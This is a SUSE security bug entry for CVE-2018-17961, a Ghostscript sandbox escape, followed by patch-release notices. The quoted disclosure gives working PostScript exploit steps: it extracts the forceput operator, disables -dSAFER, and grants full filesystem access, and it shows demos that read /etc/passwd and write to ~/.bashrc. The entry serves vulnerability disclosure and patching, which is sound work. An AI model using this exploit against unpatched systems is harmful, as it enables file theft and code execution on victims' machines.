Bug 1111479 (CVE-2018-17961)

Summary: VUL-0: CVE-2018-17961: ghostscript,ghostscript-library: bypassing executeonly to escape -dSAFER sandbox
Product: [Novell Products] SUSE Security Incidents Reporter: Alexander Bergmann <abergmann>
Component: IncidentsAssignee: Security Team bot <security-team>
Status: RESOLVED FIXED QA Contact: Security Team bot <security-team>
Severity: Normal    
Priority: P3 - Medium CC: atoptsoglou, ematsumiya, jsmeix, smash_bz, werner
Version: unspecified   
Target Milestone: ---   
Hardware: Other   
OS: Other   
URL: https://smash.suse.de/issue/216357/
Whiteboard: CVSSv3:SUSE:CVE-2018-17961:5.3:(AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)
Found By: Security Response Team Services Priority:
Business Priority: Blocker: ---
Marketing QA Status: --- IT Deployment: ---
Attachments: POC

Description Alexander Bergmann 2018-10-11 07:08:18 UTC 
http://seclists.org/oss-sec/2018/q4/28 - CVE-2018-17961

Hello, this <https://bugs.chromium.org/p/project-zero/issues/detail?id=1682> is
another ghostscript -dSAFER sandbox escape that worked in HEAD up until
recently, and probably all ghostscript versions still in use (I didn't
check exactly how far back, but a long time).

Full working exploit that works in the last few versions is attached,
viewing it in evince, imagemagick, gimp, okular, etc should add a line to
~/.bashrc. Because nautilus will automatically invoke evince-thumbnailer
without any user-interaction, just browsing a website is enough to trigger
the vulnerability in some common configurations.

taviso@ubuntu:~$ convert exploit.jpg output.jpg
taviso@ubuntu:~$ tail -1 ~/.bashrc
echo pwned by postscript

Good news: If your distro ships gnome-desktop 3.25.90 or later and wasn't
bananas enough to disable sandboxing (yes, some are really doing that), I
don't know of any way to trigger automatic exploitation. If you open the
file manually, you're still in trouble though.

BACKGROUND

One of the core access control features in postscript is the ability to
mark procedures executeonly, this prevents users from peeking inside system
routines and getting references to powerful operators they shouldn't have
access to. I have a full description of how this mechanism works, but
release of that description is blocking on some other embargoed issues. It
should be available here
<https://bugs.chromium.org/p/project-zero/issues/detail?id=1675>
eventually (please
forgive this minor violation of list rules).

Until recently you could install an error handler in errordict
<https://atrey.karlin.mff.cuni.cz/~milanek/PostScript/Reference/PSL2e.html#errordict>
and if you cause an executeonly procedure to stop ("stop" is the postscript
term for "throw an exception"), that would expose the faulting operator to
the error handler. That is no longer possible, because errordict is now
ignored in the -dSAFER sandbox (that was CVE-2018-17183
<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17183>).

DETAILS

Unfortunately, the fix was incomplete, because you could still make the
invocation of the errorhandler itself fail, or access the saved
errorhandler internal state.

One way to exploit this is to find an executeonly procedure that can stop,
trigger an exception and then make calling the errorhandler stop
(/stackoverflow or /execoverflow will do). When that fails the operand
stack is left in an inconsistent state, because ghostscript was trying to
set up the errorhandler but failed.

Here is how to exploit it:

% first, fill up the stack with junk so there is only a tiny bit of room
for the errorhandler
GS>0 1 300368 {} for

% We can make /switch_to_normal_marking_ops fail by making pdfopdict a
non-dictionary
GS<300369>/pdfopdict null def

% call /switch_to_normal_marking_ops (which is executeonly)
GS<300369>GS_PDF_ProcSet /switch_to_normal_marking_ops get stopped

% that failed because of /typecheck writing to pdfopdict
GS<2>==
true

% And if we look at the last few elements of the saved stack...
GS<1>dup dup length 10 sub 10 getinterval ==
[300364 300365 300366 300367 300368 null /m {normal_m} --.forceput--
/typecheck]

% The failed operator is on there ready to be passed to the errorhandler.

forceput is a very powerful operator that ignores all access controls, we
can extract it from the stack, and then do whatever we like.

% Lets disable SAFER and give ourselves access to the whole filesystem
(including .bashrc, ssh keys, chrome cookies, everything)
systemdict /SAFER false forceput
systemdict /userparams get /PermitFileControl [(*)] forceput
systemdict /userparams get /PermitFileWriting [(*)] forceput
systemdict /userparams get /PermitFileReading [(*)] forceput

Putting it all together, here is reading /etc/passwd just to demo:

$ gs -dSAFER -f test.ps
GPL Ghostscript GIT PRERELEASE 9.26 (2018-09-13)
Copyright (C) 2018 Artifex Software, Inc.  All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
(root:x:0:0:root:/root:/bin/bash)

The fix is public now, here are the necessary commit:

http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=a54c9e61e7d0
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=a6807394bd94

p.s. plz can we deprecate untrusted postscript :(

References:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-17961
http://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-17961.html
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=a54c9e61e7d0
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=a6807394bd94
Comment 5 Swamp Workflow Management 2018-12-12 17:09:41 UTC 
SUSE-SU-2018:4087-1: An update that solves 8 vulnerabilities and has one errata is now available.

Category: security (important)
Bug References: 1109105,1111479,1111480,1112229,1117022,1117274,1117313,1117327,1117331
CVE References: CVE-2018-17183,CVE-2018-17961,CVE-2018-18073,CVE-2018-18284,CVE-2018-19409,CVE-2018-19475,CVE-2018-19476,CVE-2018-19477
Sources used:
SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (src):    ghostscript-mini-9.26-3.9.3
SUSE Linux Enterprise Module for Desktop Applications 15 (src):    libspectre-0.2.8-3.4.3
SUSE Linux Enterprise Module for Basesystem 15 (src):    ghostscript-9.26-3.9.4
Comment 6 Swamp Workflow Management 2018-12-12 20:11:14 UTC 
SUSE-SU-2018:4090-1: An update that solves 8 vulnerabilities and has one errata is now available.

Category: security (important)
Bug References: 1109105,1111479,1111480,1112229,1117022,1117274,1117313,1117327,1117331
CVE References: CVE-2018-17183,CVE-2018-17961,CVE-2018-18073,CVE-2018-18284,CVE-2018-19409,CVE-2018-19475,CVE-2018-19476,CVE-2018-19477
Sources used:
SUSE OpenStack Cloud 7 (src):    ghostscript-9.26-23.16.1, libspectre-0.2.7-12.4.1
SUSE Linux Enterprise Software Development Kit 12-SP4 (src):    ghostscript-9.26-23.16.1, libspectre-0.2.7-12.4.1
SUSE Linux Enterprise Software Development Kit 12-SP3 (src):    ghostscript-9.26-23.16.1, libspectre-0.2.7-12.4.1
SUSE Linux Enterprise Server for SAP 12-SP2 (src):    ghostscript-9.26-23.16.1, libspectre-0.2.7-12.4.1
SUSE Linux Enterprise Server 12-SP4 (src):    ghostscript-9.26-23.16.1, libspectre-0.2.7-12.4.1
SUSE Linux Enterprise Server 12-SP3 (src):    ghostscript-9.26-23.16.1, libspectre-0.2.7-12.4.1
SUSE Linux Enterprise Server 12-SP2-LTSS (src):    ghostscript-9.26-23.16.1, libspectre-0.2.7-12.4.1
SUSE Linux Enterprise Server 12-SP2-BCL (src):    ghostscript-9.26-23.16.1, libspectre-0.2.7-12.4.1
SUSE Linux Enterprise Server 12-SP1-LTSS (src):    ghostscript-9.26-23.16.1, libspectre-0.2.7-12.4.1
SUSE Linux Enterprise Server 12-LTSS (src):    ghostscript-9.26-23.16.1, libspectre-0.2.7-12.4.1
SUSE Linux Enterprise Desktop 12-SP4 (src):    ghostscript-9.26-23.16.1, libspectre-0.2.7-12.4.1
SUSE Linux Enterprise Desktop 12-SP3 (src):    ghostscript-9.26-23.16.1, libspectre-0.2.7-12.4.1
SUSE Enterprise Storage 4 (src):    ghostscript-9.26-23.16.1, libspectre-0.2.7-12.4.1
Comment 7 Swamp Workflow Management 2018-12-15 11:11:13 UTC 
openSUSE-SU-2018:4138-1: An update that solves 8 vulnerabilities and has one errata is now available.

Category: security (important)
Bug References: 1109105,1111479,1111480,1112229,1117022,1117274,1117313,1117327,1117331
CVE References: CVE-2018-17183,CVE-2018-17961,CVE-2018-18073,CVE-2018-18284,CVE-2018-19409,CVE-2018-19475,CVE-2018-19476,CVE-2018-19477
Sources used:
openSUSE Leap 15.0 (src):    ghostscript-9.26-lp150.2.9.1, ghostscript-mini-9.26-lp150.2.9.1, libspectre-0.2.8-lp150.2.6.2
Comment 8 Swamp Workflow Management 2018-12-15 11:14:42 UTC 
openSUSE-SU-2018:4140-1: An update that solves 8 vulnerabilities and has one errata is now available.

Category: security (important)
Bug References: 1109105,1111479,1111480,1112229,1117022,1117274,1117313,1117327,1117331
CVE References: CVE-2018-17183,CVE-2018-17961,CVE-2018-18073,CVE-2018-18284,CVE-2018-19409,CVE-2018-19475,CVE-2018-19476,CVE-2018-19477
Sources used:
openSUSE Leap 42.3 (src):    ghostscript-9.26-14.12.1, ghostscript-mini-9.26-14.12.1, libspectre-0.2.7-17.4.2
Comment 9 Swamp Workflow Management 2019-04-27 22:38:20 UTC 
SUSE-SU-2018:4090-2: An update that solves 8 vulnerabilities and has one errata is now available.

Category: security (important)
Bug References: 1109105,1111479,1111480,1112229,1117022,1117274,1117313,1117327,1117331
CVE References: CVE-2018-17183,CVE-2018-17961,CVE-2018-18073,CVE-2018-18284,CVE-2018-19409,CVE-2018-19475,CVE-2018-19476,CVE-2018-19477
Sources used:
SUSE Linux Enterprise Server for SAP 12-SP1 (src):    ghostscript-9.26-23.16.1, libspectre-0.2.7-12.4.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 10 Alexandros Toptsoglou 2019-05-13 16:40:07 UTC 
Created attachment 804905 [details]
POC
Comment 14 Marcus Meissner 2020-01-28 07:19:22 UTC 
released